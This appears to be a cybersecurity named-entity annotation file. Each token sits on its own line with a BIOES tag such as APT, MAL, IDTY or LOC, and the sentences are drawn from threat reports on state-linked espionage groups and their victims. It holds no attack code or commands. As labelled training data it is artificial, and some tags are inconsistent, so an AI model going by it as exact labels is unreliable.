+the O
+French O
+Ministry O
+of O
+Foreign O
+Affairs O
+. O
+
+On O
+November B-TIME
+10 I-TIME
+, I-TIME
+2015 E-TIME
+, O
+Lotus B-APT
+Blossom E-APT
+sent O
+a O
+spear-phishing S-ACT
+email E-ACT
+to O
+an O
+individual S-IDTY
+at O
+the O
+French O
+Ministry O
+of O
+Foreign O
+Affairs O
+. O
+
+APT B-APT
+threat I-APT
+actors E-APT
+, O
+most O
+likely O
+nation O
+state-sponsored O
+, O
+targeted O
+a O
+diplomat S-IDTY
+in O
+the O
+French O
+Ministry O
+of O
+Foreign O
+Affairs O
+with O
+a O
+seemingly O
+legitimate O
+invitation O
+to O
+a O
+technology O
+conference O
+in O
+Taiwan S-LOC
+. O
+
+Additionally O
+, O
+the O
+targeting O
+of O
+a O
+French B-IDTY
+diplomat E-IDTY
+based O
+in O
+Taipei O
+, O
+Taiwan S-LOC
+aligns O
+with O
+previous O
+targeting O
+by O
+these O
+actors S-APT
+, O
+as O
+does O
+the O
+separate O
+infrastructure O
+. O
+
+Since O
+at O
+least O
+2014 S-TIME
+, O
+APT32 S-APT
+, O
+also O
+known O
+as O
+the O
+OceanLotus B-APT
+Group E-APT
+, O
+has O
+targeted O
+foreign B-IDTY
+corporations E-IDTY
+with O
+investments O
+in O
+Vietnam S-LOC
+, O
+foreign B-IDTY
+governments E-IDTY
+, O
+journalists S-IDTY
+, O
+and O
+Vietnamese S-LOC
+dissidents S-IDTY
+. O
+
+APT35 S-APT
+typically O
+targets O
+U.S. S-LOC
+and O
+the O
+Middle B-LOC
+Eastern E-LOC
+military S-IDTY
+, O
+diplomatic S-IDTY
+and O
+government B-IDTY
+personnel E-IDTY
+, O
+organizations S-IDTY
+in O
+the O
+media S-IDTY
+, O
+energy S-IDTY
+and O
+defense B-IDTY
+industrial I-IDTY
+base E-IDTY
+( O
+DIB S-IDTY
+) O
+, O
+and O
+engineering S-IDTY
+, O
+business B-IDTY
+services E-IDTY
+and O
+telecommunications B-IDTY
+sectors E-IDTY
+. O
+
+COBALT B-APT
+GYPSY E-APT
+has O
+used O
+spearphishing S-ACT
+to O
+target O
+telecommunications S-IDTY
+, O
+government S-IDTY
+, O
+defense S-IDTY
+, O
+oil S-IDTY
+, O
+and O
+financial B-IDTY
+services I-IDTY
+organizations E-IDTY
+based O
+in O
+or O
+affiliated O
+with O
+the O
+MENA S-LOC
+region O
+, O
+identifying O
+individual B-IDTY
+victims E-IDTY
+through O
+social B-IDTY
+media E-IDTY
+sites O
+. O
+
+The O
+Magic O
+Hound O
+has O
+repeatedly O
+used O
+social B-IDTY
+media E-IDTY
+to O
+identify O
+and O
+interact O
+with O
+employees S-IDTY
+at O
+targeted O
+organizations O
+and O
+then O
+used O
+weaponized O
+Excel B-ACT
+documents E-ACT
+. O
+
+The O
+May B-TIME
+2014 E-TIME
+' O
+Operation B-ACT
+Saffron I-ACT
+Rose E-ACT
+' O
+publication O
+identifies O
+an O
+Iranian S-LOC
+hacking O
+group O
+formerly O
+named O
+' O
+Ajax B-APT
+Security E-APT
+' O
+( O
+code-named O
+' O
+Flying B-APT
+Kitten E-APT
+' O
+by O
+CrowdStrike S-SECTEAM
+) O
+engaged O
+in O
+active O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+on O
+Iranian S-LOC
+dissidents S-IDTY
+( O
+those O
+attempting O
+to O
+circumvent O
+government O
+traffic O
+monitoring O
+) O
+. O
+
+An O
+Iranian S-LOC
+hacking O
+group O
+formerly O
+named O
+Ajax B-APT
+Security E-APT
+( O
+code-named O
+' O
+Flying B-APT
+Kitten E-APT
+' O
+by O
+CrowdStrike S-SECTEAM
+) O
+engaged O
+in O
+active O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+on O
+Iranian S-LOC
+dissidents S-IDTY
+( O
+those O
+attempting O
+to O
+circumvent O
+government O
+traffic O
+monitoring O
+) O
+. O
+
+PIVY S-MAL
+also O
+played O
+a O
+key O
+role O
+in O
+the O
+2011 B-ACT
+campaign E-ACT
+known O
+as O
+Nitro O
+that O
+targeted O
+chemical B-IDTY
+makers E-IDTY
+, O
+government B-IDTY
+agencies E-IDTY
+, O
+defense B-IDTY
+contractors E-IDTY
+, O
+and O
+human O
+rights O
+groups.10,11 O
+Still O
+active O
+a O
+year O
+later O
+, O
+the O
+Nitro O
+attackers S-APT
+used O
+a O
+zero-day S-VULNAME
+vulnerability O
+in O
+Java O
+to O
+deploy O
+PIVY S-MAL
+in O
+2012 S-TIME
+. O
+
+APT10 S-APT
+is O
+known O
+to O
+have O
+exfiltrated O
+a O
+high O
+volume O
+of O
+data O
+from O
+multiple O
+victims O
+, O
+exploiting O
+compromised O
+MSP B-MAL
+networks E-MAL
+, O
+and O
+those O
+of O
+their O
+customers S-IDTY
+, O
+to O
+stealthily O
+move O
+this O
+data O
+around O
+the O
+world O
+. O
+
+Targeted O
+sectors O
+of O
+Molerats S-APT
+include O
+governmental S-IDTY
+and O
+diplomatic I-IDTY
+institutions E-IDTY
+, O
+including O
+embassies S-IDTY
+; O
+companies O
+from O
+the O
+aerospace S-IDTY
+and O
+defence B-IDTY
+Industries E-IDTY
+; O
+financial B-IDTY
+institutions E-IDTY
+; O
+journalists S-IDTY
+; O
+software B-IDTY
+developers E-IDTY
+. O
+
+It O
+was O
+during O
+operator O
+X O
+'s O
+network O
+monitoring O
+that O
+the O
+attackers S-APT
+placed O
+Naikon B-MAL
+proxies E-MAL
+within O
+the O
+countries O
+' O
+borders O
+, O
+to O
+cloak O
+and O
+support O
+real-time O
+outbound O
+connections O
+and O
+data O
+Exfiltration S-ACT
+from O
+high-profile O
+victim O
+organizations E-IDTY
+. O
+
+In O
+early B-TIME
+May I-TIME
+2016 E-TIME
+, O
+both O
+PROMETHIUM S-APT
+and O
+NEODYMIUM S-APT
+started O
+conducting O
+attack B-ACT
+campaigns E-ACT
+against O
+specific B-IDTY
+individuals E-IDTY
+in O
+Europe S-LOC
+. O
+
+Although O
+most O
+malware O
+today O
+either O
+seeks O
+monetary O
+gain O
+or O
+conducts O
+espionage S-ACT
+for O
+economic S-IDTY
+advantage O
+, O
+both O
+of O
+these O
+activity B-APT
+groups E-APT
+appear O
+to O
+seek O
+information O
+about O
+specific B-IDTY
+individuals E-IDTY
+. O
+
+Attackers S-APT
+using O
+several O
+locations O
+in O
+China S-LOC
+have O
+leveraged O
+C&C S-TOOL
+servers O
+on O
+purchased O
+hosted O
+services O
+in O
+the O
+United B-LOC
+States E-LOC
+and O
+compromised O
+servers O
+in O
+the O
+Netherlands S-LOC
+to O
+wage O
+attacks O
+against O
+global O
+oil S-IDTY
+, O
+gas S-IDTY
+, O
+and O
+petrochemical B-IDTY
+companies E-IDTY
+, O
+as O
+well O
+as O
+individuals O
+and O
+executives S-IDTY
+in O
+Kazakhstan S-LOC
+, O
+Taiwan S-LOC
+, O
+Greece S-LOC
+, O
+and O
+the O
+United B-LOC
+States E-LOC
+to O
+acquire O
+proprietary O
+and O
+highly O
+confidential O
+information O
+. O
+
+Attackers S-APT
+using O
+several O
+locations O
+in O
+China S-LOC
+have O
+leveraged O
+C&C S-TOOL
+servers O
+on O
+purchased O
+hosted O
+services O
+in O
+the O
+United B-LOC
+States E-LOC
+and O
+compromised O
+servers O
+in O
+the O
+Netherlands S-LOC
+to O
+wage O
+attacks O
+against O
+global O
+oil S-IDTY
+, O
+gas S-IDTY
+, O
+and O
+petrochemical B-IDTY
+companies E-IDTY
+, O
+as O
+well O
+as O
+individuals O
+and O
+executives S-IDTY
+in O
+Kazakhstan S-LOC
+, O
+Taiwan S-LOC
+, O
+Greece S-LOC
+, O
+and O
+the O
+United B-LOC
+States E-LOC
+to O
+acquire O
+proprietary O
+and O
+highly O
+confidential O
+information O
+. O
+
+Additionally O
+, O
+HELIX B-APT
+KITTEN I-APT
+actors E-APT
+have O
+shown O
+an O
+affinity O
+for O
+creating O
+thoroughly O
+researched O
+and O
+structured O
+spear-phishing S-ACT
+messages O
+relevant O
+to O
+the O
+interests O
+of O
+targeted O
+personnel S-IDTY
+. O
+
+The O
+attackers S-APT
+sent O
+multiple O
+emails S-TOOL
+containing O
+macro-enabled O
+XLS B-FILE
+files E-FILE
+to O
+employees B-IDTY
+working I-IDTY
+in I-IDTY
+the I-IDTY
+banking I-IDTY
+sector E-IDTY
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+In O
+late O
+2015 S-TIME
+, O
+Symantec S-SECTEAM
+identified O
+suspicious O
+activity O
+involving O
+a O
+hacking O
+tool O
+used O
+in O
+a O
+malicious O
+manner O
+against O
+one O
+of O
+our O
+customers S-IDTY
+. O
+
+The O
+SWC S-ACT
+of O
+a O
+Uyghur O
+cultural O
+website O
+suggests O
+intent O
+to O
+target O
+the O
+Uyghur B-IDTY
+ethnic I-IDTY
+group E-IDTY
+, O
+a O
+Muslim B-IDTY
+minority I-IDTY
+group E-IDTY
+primarily O
+found O
+in O
+the O
+Xinjiang S-LOC
+region O
+of O
+China O
+. O
+
+It's O
+possible O
+TG-3390 S-APT
+used O
+a O
+waterhole S-ACT
+to O
+infect O
+data B-IDTY
+center I-IDTY
+employees E-IDTY
+. O
+
+The O
+initial O
+attack O
+vector O
+used O
+in O
+the O
+attack O
+against O
+the O
+data O
+center O
+is O
+unclear O
+, O
+but O
+researchers O
+believe O
+LuckyMouse S-APT
+possibly O
+had O
+conducted O
+watering B-ACT
+hole E-ACT
+or O
+phishing B-ACT
+attacks E-ACT
+to O
+compromise O
+accounts O
+belonging O
+to O
+employees S-IDTY
+at O
+the O
+national O
+data O
+center O
+. O
+
+The O
+group O
+, O
+believed O
+to O
+be O
+based O
+in O
+China S-LOC
+, O
+has O
+also O
+targeted O
+defense B-IDTY
+contractors E-IDTY
+, O
+colleges S-IDTY
+and O
+universities S-IDTY
+, O
+law B-IDTY
+firms E-IDTY
+, O
+and O
+political B-IDTY
+organizations E-IDTY
+— O
+including O
+organizations O
+related O
+to O
+Chinese O
+minority B-IDTY
+ethnic I-IDTY
+groups E-IDTY
+. O
+
+In O
+all O
+cases O
+, O
+based O
+on O
+the O
+nature O
+of O
+the O
+computers O
+infected O
+by O
+Thrip O
+, O
+it O
+appeared O
+that O
+the O
+telecoms B-IDTY
+companies E-IDTY
+themselves O
+and O
+not O
+their O
+customers S-IDTY
+were O
+the O
+targets O
+of O
+these O
+attacks O
+. O
+
+Turla S-APT
+is O
+a O
+notorious O
+group O
+that O
+has O
+been O
+targeting O
+government B-IDTY
+officials E-IDTY
+. O
+
+Turla S-APT
+is O
+a O
+notorious O
+group O
+that O
+has O
+been O
+targeting O
+diplomats S-IDTY
+. O
+
+The O
+attackers O
+behind O
+Epic B-MAL
+Turla E-MAL
+have O
+infected O
+several O
+hundred O
+computers O
+in O
+more O
+than O
+45 O
+countries O
+, O
+including O
+embassies S-IDTY
+. O
+
+From O
+February S-TIME
+to O
+September B-TIME
+2016 E-TIME
+, O
+WhiteBear B-ACT
+activity E-ACT
+was O
+narrowly O
+focused O
+on O
+embassies S-IDTY
+and O
+consular O
+operations O
+around O
+the O
+world O
+. O
+
+All O
+of O
+these O
+early O
+WhiteBear S-MAL
+targets O
+were O
+related O
+to O
+embassies S-IDTY
+and O
+diplomatic/foreign O
+affair O
+organizations O
+. O
+
+Thus O
+, O
+Turla S-APT
+operators O
+had O
+access O
+to O
+some O
+highly O
+sensitive O
+information O
+( O
+such O
+as O
+emails S-TOOL
+sent O
+by O
+the O
+German B-IDTY
+Foreign I-IDTY
+Office I-IDTY
+staff E-IDTY
+) O
+for O
+almost O
+a O
+year O
+. O
+
+We O
+suspect O
+the O
+Kazuar B-MAL
+tool E-MAL
+may O
+be O
+linked O
+to O
+the O
+Turla S-APT
+threat O
+actor O
+group O
+( O
+also O
+known O
+as O
+Uroburos S-APT
+and O
+Snake S-APT
+) O
+, O
+who O
+have O
+been O
+reported O
+to O
+have O
+compromised O
+embassies S-IDTY
+, O
+defense B-IDTY
+contractors E-IDTY
+, O
+educational B-IDTY
+institutions E-IDTY
+, O
+and O
+research B-IDTY
+organizations E-IDTY
+across O
+the O
+globe O
+. O
+
+Deepen S-SECTEAM
+told O
+Threatpost O
+the O
+group O
+has O
+been O
+operating O
+since O
+at O
+least O
+since O
+2008 S-TIME
+and O
+has O
+targeted O
+China B-IDTY
+and I-IDTY
+US I-IDTY
+relations I-IDTY
+experts E-IDTY
+, O
+Defense B-SECTEAM
+Department E-SECTEAM
+entities O
+, O
+and O
+geospatial B-IDTY
+groups E-IDTY
+within O
+the O
+federal B-IDTY
+government E-IDTY
+. O
+
+Government B-IDTY
+officials E-IDTY
+said O
+they O
+knew O
+the O
+initial O
+attack O
+occurred O
+in O
+2011 S-TIME
+, O
+but O
+are O
+unaware O
+of O
+who O
+specifically O
+is O
+behind O
+the O
+attacks O
+. O
+
+Bahamut O
+was O
+first O
+noticed O
+when O
+it O
+targeted O
+a O
+Middle B-IDTY
+Eastern I-IDTY
+human I-IDTY
+rights I-IDTY
+activist E-IDTY
+in O
+the O
+first O
+week O
+of O
+January B-TIME
+2017 E-TIME
+. O
+
+Later O
+that O
+month O
+, O
+the O
+same O
+tactics O
+and O
+patterns O
+were O
+seen O
+in O
+attempts O
+against O
+an O
+Iranian B-IDTY
+women I-IDTY
+'s I-IDTY
+activist E-IDTY
+– O
+an O
+individual S-IDTY
+commonly O
+targeted O
+by O
+Iranian B-LOC
+actors E-LOC
+, O
+such O
+as O
+Charming O
+Kitten O
+and O
+the O
+Sima B-ACT
+campaign E-ACT
+documented O
+in O
+our O
+2016 S-TIME
+Black O
+Hat O
+talk O
+. O
+
+Several O
+times O
+, O
+APT5 S-APT
+has O
+targeted O
+organizations S-IDTY
+and O
+personnel S-IDTY
+based O
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+Given O
+our O
+increased O
+confidence O
+that O
+Bahamut O
+was O
+responsible O
+for O
+targeting O
+of O
+Qatari S-LOC
+labor B-IDTY
+rights I-IDTY
+advocates E-IDTY
+and O
+its O
+focus O
+on O
+the O
+foreign B-IDTY
+policy I-IDTY
+institutions E-IDTY
+other O
+Gulf O
+states O
+, O
+Bahamut O
+'s O
+interests O
+are O
+seemingly O
+too O
+expansive O
+to O
+be O
+limited O
+one O
+sponsor O
+or O
+customer O
+. O
+
+Barium S-APT
+specializes O
+in O
+targeting O
+high O
+value O
+organizations O
+holding O
+sensitive O
+data O
+, O
+by O
+gathering O
+extensive O
+information O
+about O
+their O
+employees S-IDTY
+through O
+publicly O
+available O
+information O
+and O
+social B-IDTY
+media E-IDTY
+, O
+using O
+that O
+information O
+to O
+fashion O
+phishing B-ACT
+attacks E-ACT
+intended O
+to O
+trickthose O
+employees S-IDTY
+into O
+compromising O
+their O
+computers O
+and O
+networks O
+. O
+
+Barium S-APT
+has O
+targeted O
+Microsoft B-IDTY
+customers E-IDTY
+both O
+in O
+Virginia O
+, O
+the O
+United O
+States O
+, O
+and O
+around O
+the O
+world O
+. O
+
+BLACKGEAR S-ACT
+is O
+an O
+espionage B-ACT
+campaign E-ACT
+which O
+has O
+targeted O
+users S-IDTY
+in O
+Taiwan S-LOC
+for O
+many O
+years O
+. O
+
+Our O
+research O
+indicates O
+that O
+it O
+has O
+started O
+targeting O
+Japanese B-IDTY
+users E-IDTY
+. O
+
+Our O
+experts O
+have O
+found O
+that O
+cybercriminals O
+are O
+actively O
+focusing O
+on O
+SMBs S-MAL
+, O
+and O
+giving O
+particular O
+attention O
+to O
+accountants S-IDTY
+. O
+
+Clever B-APT
+Kitten E-APT
+actors O
+have O
+a O
+strong O
+affinity O
+for O
+PHP O
+server-side O
+attacks O
+to O
+make O
+access O
+; O
+this O
+is O
+relatively O
+unique O
+amongst O
+targeted O
+attackers O
+who O
+often O
+favor O
+targeting O
+a O
+specific O
+individual S-IDTY
+at O
+a O
+specific O
+organization O
+using O
+social B-IDTY
+engineering E-IDTY
+. O
+
+Some O
+of O
+the O
+exploit S-VULNAME
+server O
+paths O
+contain O
+modules O
+that O
+appear O
+to O
+have O
+been O
+designed O
+to O
+infect O
+Linux S-OS
+computers O
+, O
+but O
+we O
+have O
+not O
+yet O
+located O
+the O
+Linux S-OS
+backdoor O
+. O
+
+Confucius O
+targeted O
+a O
+particular O
+set O
+of O
+individuals O
+in O
+South O
+Asian O
+countries O
+, O
+such O
+as O
+military B-IDTY
+personnel E-IDTY
+and O
+businessmen S-IDTY
+, O
+among O
+others O
+. O
+
+According O
+to O
+statistics O
+, O
+Corkow S-MAL
+primarily O
+targets O
+users S-IDTY
+in O
+Russia O
+and O
+the O
+CIS O
+, O
+but O
+it O
+is O
+worth O
+noting O
+that O
+in O
+2014 S-TIME
+the O
+amount O
+of O
+attacks O
+targeting O
+the O
+USA O
+increased O
+by O
+5 O
+times O
+, O
+in O
+comparison O
+with O
+2011 S-TIME
+. O
+
+The O
+threat O
+is O
+likely O
+targeting O
+employees S-IDTY
+of O
+various O
+Palestinian S-LOC
+government B-IDTY
+agencies E-IDTY
+, O
+security B-IDTY
+services E-IDTY
+, O
+Palestinian O
+students S-IDTY
+, O
+and O
+those O
+affiliated O
+with O
+the O
+Fatah B-IDTY
+political I-IDTY
+party E-IDTY
+. O
+
+For O
+example O
+, O
+the O
+actors O
+behind O
+FrozenCell S-MAL
+used O
+a O
+spoofed O
+app O
+called O
+Tawjihi B-MAL
+2016 E-MAL
+, O
+which O
+Jordanian S-LOC
+or O
+Palestinian S-LOC
+students S-IDTY
+would O
+ordinarily O
+use O
+during O
+their O
+general O
+secondary O
+examination O
+. O
+
+The O
+titles O
+and O
+contents O
+of O
+these O
+files O
+suggest O
+that O
+the O
+actor O
+targeted O
+individuals O
+affiliated O
+with O
+these O
+government B-IDTY
+agencies E-IDTY
+and O
+the O
+Fatah B-IDTY
+political I-IDTY
+party E-IDTY
+. O
+
+Political B-IDTY
+entities E-IDTY
+in O
+Central O
+Asia O
+have O
+been O
+targeted O
+throughout O
+2018 S-TIME
+by O
+different O
+actors O
+, O
+including O
+IndigoZebra S-APT
+, O
+Sofacy S-APT
+( O
+with O
+Zebrocy S-MAL
+malware S-MAL
+) O
+and O
+most O
+recently O
+by O
+DustSquad O
+( O
+with O
+Octopus S-MAL
+malware S-MAL
+) O
+. O
+
+Targets O
+included O
+a O
+wide O
+array O
+of O
+high-profile O
+entities O
+, O
+including O
+intelligence B-IDTY
+services E-IDTY
+, O
+military S-IDTY
+, O
+utility B-IDTY
+providers E-IDTY
+( O
+telecommunications S-IDTY
+and O
+power S-IDTY
+) O
+, O
+embassies S-IDTY
+, O
+and O
+government B-IDTY
+institutions E-IDTY
+. O
+
+The O
+computers O
+of O
+diplomats S-IDTY
+, O
+military B-IDTY
+attachés E-IDTY
+, O
+private B-IDTY
+assistants E-IDTY
+, O
+secretaries S-IDTY
+to O
+Prime B-IDTY
+Ministers E-IDTY
+, O
+journalists S-IDTY
+and O
+others O
+are O
+under O
+the O
+concealed O
+control O
+of O
+unknown O
+assailant O
+(s O
+) O
+. O
+
+The O
+banking O
+malware O
+GozNym S-MAL
+has O
+legs O
+; O
+only O
+a O
+few O
+weeks O
+after O
+the O
+hybrid O
+Trojan S-MAL
+was O
+discovered O
+, O
+it O
+has O
+reportedly O
+spread O
+into O
+Europe O
+and O
+begun O
+plaguing O
+banking B-IDTY
+customers E-IDTY
+in O
+Poland O
+with O
+redirection B-ACT
+attacks E-ACT
+. O
+
+We O
+noted O
+in O
+our O
+original O
+blog O
+the O
+large O
+amount O
+of O
+targeting O
+of O
+Iranian S-LOC
+citizens S-IDTY
+in O
+this O
+campaign O
+, O
+we O
+observed O
+almost O
+one-third O
+of O
+all O
+victims O
+to O
+be O
+Iranian O
+. O
+
+Since O
+early O
+2013 S-TIME
+, O
+we O
+have O
+observed O
+activity O
+from O
+a O
+unique O
+threat O
+actor O
+group O
+, O
+which O
+we O
+began O
+to O
+investigate O
+based O
+on O
+increased O
+activities S-ACT
+against O
+human O
+right O
+activists S-IDTY
+in O
+the O
+beginning O
+of O
+2015 S-TIME
+. O
+
+Over O
+the O
+course O
+of O
+three O
+years O
+of O
+observation O
+of O
+campaigns S-ACT
+targeting O
+civil B-IDTY
+society E-IDTY
+and O
+human B-IDTY
+rights I-IDTY
+organizations E-IDTY
+, O
+from O
+records O
+of O
+well O
+over O
+two O
+hundred O
+spearphishing S-ACT
+and O
+other O
+intrusion O
+attempts O
+against O
+individuals O
+inside O
+of O
+Iran S-LOC
+and O
+in O
+the O
+diaspora S-IDTY
+, O
+a O
+narrative O
+of O
+persistent O
+intrusion O
+efforts O
+emerges O
+. O
+
+Over O
+the O
+months O
+following O
+the O
+elections O
+, O
+the O
+accounts O
+of O
+Iranians S-IDTY
+that O
+had O
+been O
+compromised O
+by O
+the O
+actors O
+were O
+then O
+used O
+for O
+spreading O
+the O
+malware O
+. O
+
+The O
+Infy S-MAL
+malware S-MAL
+was O
+seen O
+targeting O
+Iranians S-IDTY
+again O
+in O
+June B-TIME
+2015 E-TIME
+, O
+when O
+it O
+was O
+shared O
+with O
+researchers O
+after O
+being O
+sent O
+to O
+a O
+broadcast B-IDTY
+journalist E-IDTY
+at O
+BBC B-IDTY
+Persian E-IDTY
+with O
+a O
+generic O
+introduction O
+and O
+a O
+PowerPoint S-TOOL
+presentation O
+attached O
+titled O
+" O
+Nostalogy O
+" O
+( O
+sic O
+) O
+. O
+
+One O
+narrowly-targeted O
+spearphishing S-ACT
+from O
+Infy O
+was O
+sent O
+from O
+the O
+compromised O
+account O
+of O
+a O
+political B-IDTY
+activist E-IDTY
+promoting O
+participation O
+inside O
+of O
+Iran S-LOC
+, O
+claiming O
+to O
+be O
+a O
+set O
+of O
+images O
+of O
+a O
+British-Iranian S-IDTY
+dual O
+national O
+that O
+has O
+been O
+held O
+in O
+Evin O
+Prison O
+for O
+five O
+years O
+on O
+espionage O
+charges O
+. O
+
+As O
+in O
+the O
+past O
+, O
+these O
+messages O
+have O
+been O
+sent O
+accounts O
+believed O
+to O
+be O
+fake O
+and O
+accounts O
+compromised O
+by O
+Infy O
+, O
+including O
+Kurdish B-IDTY
+activists E-IDTY
+that O
+had O
+previously O
+been O
+compromised O
+by O
+the O
+Flying B-APT
+Kitten I-APT
+actor I-APT
+group E-APT
+. O
+
+The O
+Windows B-MAL
+10 I-MAL
+Creators I-MAL
+Update E-MAL
+will O
+bring O
+several O
+enhancements O
+to O
+Windows B-SECTEAM
+Defender I-SECTEAM
+ATP E-SECTEAM
+that O
+will O
+provide O
+SOC B-IDTY
+personnel E-IDTY
+with O
+options O
+for O
+immediate O
+mitigation O
+of O
+a O
+detected O
+threat O
+. O
+
+LEAD O
+and O
+Barium S-APT
+are O
+not O
+known O
+for O
+large-scale O
+spear-phishing S-ACT
+, O
+so O
+it O
+is O
+unlikely O
+that O
+SOC B-IDTY
+personnel E-IDTY
+would O
+have O
+to O
+deal O
+with O
+multiple O
+machines O
+having O
+been O
+compromised O
+by O
+these O
+groups O
+at O
+the O
+same O
+time O
+. O
+
+While O
+the O
+machine O
+is O
+in O
+isolation O
+, O
+SOC B-IDTY
+personnel E-IDTY
+can O
+direct O
+the O
+infected O
+machine O
+to O
+collect O
+live O
+investigation O
+data O
+, O
+such O
+as O
+the O
+DNS S-PROT
+cache O
+or O
+security O
+event O
+logs O
+, O
+which O
+they O
+can O
+use O
+to O
+verify O
+alerts O
+, O
+assess O
+the O
+state O
+of O
+the O
+intrusion O
+, O
+and O
+support O
+follow-up O
+actions O
+. O
+
+The O
+samples O
+provided O
+were O
+alleged O
+to O
+be O
+targeting O
+Tibetan S-LOC
+and O
+Chinese B-LOC
+Pro-Democracy I-IDTY
+Activists E-IDTY
+. O
+
+They O
+are O
+often O
+targeted O
+simultaneously O
+with O
+other O
+ethnic B-IDTY
+minorities E-IDTY
+and O
+religious B-IDTY
+groups E-IDTY
+in O
+China S-LOC
+. O
+
+Examples O
+as O
+early O
+as O
+2008 S-TIME
+document B-FILE
+malware E-FILE
+operations O
+against O
+Tibetan B-IDTY
+non-governmental I-IDTY
+organizations E-IDTY
+( O
+NGOs S-IDTY
+) O
+that O
+also O
+targeted O
+Falun B-IDTY
+Gong E-IDTY
+and O
+Uyghur B-IDTY
+groups E-IDTY
+. O
+
+Unit B-SECTEAM
+42 E-SECTEAM
+recently O
+identified O
+a O
+targeted B-ACT
+attack E-ACT
+against O
+an O
+individual O
+working O
+for O
+the O
+Foreign B-IDTY
+Ministry E-IDTY
+of O
+Uzbekistan B-LOC
+in I-LOC
+China E-LOC
+. O
+
+NetTraveler S-MAL
+has O
+been O
+used O
+to O
+target O
+diplomats S-IDTY
+, O
+embassies S-IDTY
+and O
+government B-IDTY
+institutions E-IDTY
+for O
+over O
+a O
+decade O
+, O
+and O
+remains O
+the O
+tool O
+of O
+choice O
+by O
+the O
+adversaries O
+behind O
+these O
+cyber B-ACT
+espionage I-ACT
+campaigns E-ACT
+. O
+
+The O
+NetTraveler O
+group O
+has O
+infected O
+victims O
+across O
+multiple O
+establishments O
+in O
+both O
+the O
+public O
+and O
+private O
+sector O
+including O
+government B-IDTY
+institutions E-IDTY
+, O
+embassies S-IDTY
+, O
+the O
+oil B-IDTY
+and I-IDTY
+gas I-IDTY
+industry E-IDTY
+, O
+research O
+centers O
+, O
+military B-IDTY
+contractors E-IDTY
+and O
+activists S-IDTY
+. O
+
+The O
+main O
+point O
+that O
+sets O
+Operation B-ACT
+Groundbait E-ACT
+apart O
+from O
+the O
+other O
+attacks O
+is O
+that O
+it O
+has O
+mostly O
+been O
+targeting O
+anti-government B-IDTY
+separatists E-IDTY
+in O
+the O
+self-declared O
+Donetsk O
+and O
+Luhansk O
+People O
+'s O
+Republics O
+. O
+
+Although O
+Silence O
+'s O
+phishing B-ACT
+emails S-TOOL
+were O
+also O
+sent O
+to O
+bank B-IDTY
+employees E-IDTY
+in O
+Central B-LOC
+and I-LOC
+Western I-LOC
+Europe E-LOC
+, O
+Africa S-LOC
+, O
+and O
+Asia S-LOC
+) O
+. O
+
+They O
+tried O
+new O
+techniques O
+to O
+steal O
+from O
+banking O
+systems O
+, O
+including O
+AWS O
+CBR O
+( O
+the O
+Russian S-LOC
+Central B-IDTY
+Bank I-IDTY
+'s I-IDTY
+Automated I-IDTY
+Workstation I-IDTY
+Client E-IDTY
+) O
+, O
+ATMs S-IDTY
+, O
+and O
+card O
+processing O
+. O
+
+However O
+, O
+some O
+phishing B-ACT
+emails S-TOOL
+were O
+sent O
+to O
+bank B-IDTY
+employees E-IDTY
+in O
+more O
+than O
+25 O
+countries O
+of O
+Central S-LOC
+and O
+Western S-LOC
+Europe S-LOC
+, O
+Africa S-LOC
+and O
+Asia S-LOC
+including O
+: O
+Kyrgyzstan S-LOC
+, O
+Armenia S-LOC
+, O
+Georgia S-LOC
+, O
+Serbia S-LOC
+, O
+Germany S-LOC
+, O
+Latvia S-LOC
+, O
+Czech B-LOC
+Republic E-LOC
+, O
+Romania S-LOC
+, O
+Kenya S-LOC
+, O
+Israel S-LOC
+, O
+Cyprus S-LOC
+, O
+Greece S-LOC
+, O
+Turkey S-LOC
+, O
+Taiwan S-LOC
+, O
+Malaysia S-LOC
+, O
+Switzerland S-LOC
+, O
+Vietnam S-LOC
+, O
+Austria S-LOC
+, O
+Uzbekistan S-LOC
+, O
+Great B-LOC
+Britain E-LOC
+, O
+Hong B-LOC
+Kong E-LOC
+, O
+and O
+others O
+. O
+
+An O
+interesting O
+point O
+in O
+the O
+Silence B-ACT
+attack E-ACT
+is O
+that O
+the O
+cybercriminals O
+had O
+already O
+compromised O
+banking S-IDTY
+infrastructure O
+in O
+order O
+to O
+send O
+their O
+spear-phishing S-ACT
+emails S-TOOL
+from O
+the O
+addresses O
+of O
+real O
+bank B-IDTY
+employees E-IDTY
+and O
+look O
+as O
+unsuspicious O
+as O
+possible O
+to O
+future O
+victims O
+. O
+
+A O
+preliminary O
+analysis O
+caught O
+the O
+attention O
+of O
+our O
+Threat O
+Analysis O
+and O
+Intelligence O
+team O
+as O
+it O
+yielded O
+interesting O
+data O
+that O
+, O
+among O
+other O
+things O
+, O
+shows O
+that O
+Silence O
+was O
+targeting O
+employees S-IDTY
+from O
+financial B-IDTY
+entities E-IDTY
+, O
+specifically O
+in O
+the O
+Russian B-LOC
+Federation E-LOC
+and O
+the O
+Republic B-LOC
+of I-LOC
+Belarus E-LOC
+. O
+
+While O
+the O
+Sima O
+moniker O
+could O
+similarly O
+originate O
+from O
+software O
+labels O
+, O
+it O
+is O
+a O
+common O
+female O
+Persian O
+name O
+and O
+a O
+Persian-language O
+Word S-TOOL
+for O
+" O
+visage O
+" O
+or O
+" O
+appearance O
+" O
+. O
+Given O
+its O
+use O
+in O
+more O
+advanced O
+social B-IDTY
+engineering I-IDTY
+campaigns E-IDTY
+against O
+women B-IDTY
+'s I-IDTY
+rights I-IDTY
+activists E-IDTY
+, O
+the O
+label O
+seem O
+particularly O
+apt O
+. O
+
+Samples O
+and O
+resource O
+names O
+contained O
+the O
+family O
+names O
+of O
+prominent O
+Iranians S-IDTY
+, O
+and O
+several O
+of O
+these O
+individuals O
+received O
+the O
+malware O
+located O
+in O
+their O
+respective O
+folder O
+. O
+
+For O
+the O
+sake O
+of O
+narrative O
+we O
+are O
+going O
+to O
+focus O
+exclusively O
+to O
+those O
+samples O
+we O
+identified O
+being O
+used O
+in O
+attacks O
+against O
+Iranian S-LOC
+civil B-IDTY
+society E-IDTY
+and O
+diaspora S-IDTY
+. O
+
+After O
+reviewing O
+all O
+the O
+malware O
+functionalities O
+, O
+we O
+are O
+confident O
+in O
+saying O
+that O
+the O
+attackers S-APT
+look O
+for O
+victims B-IDTY
+who I-IDTY
+answer E-IDTY
+well-defined O
+characteristics O
+and O
+believe O
+that O
+further O
+stages O
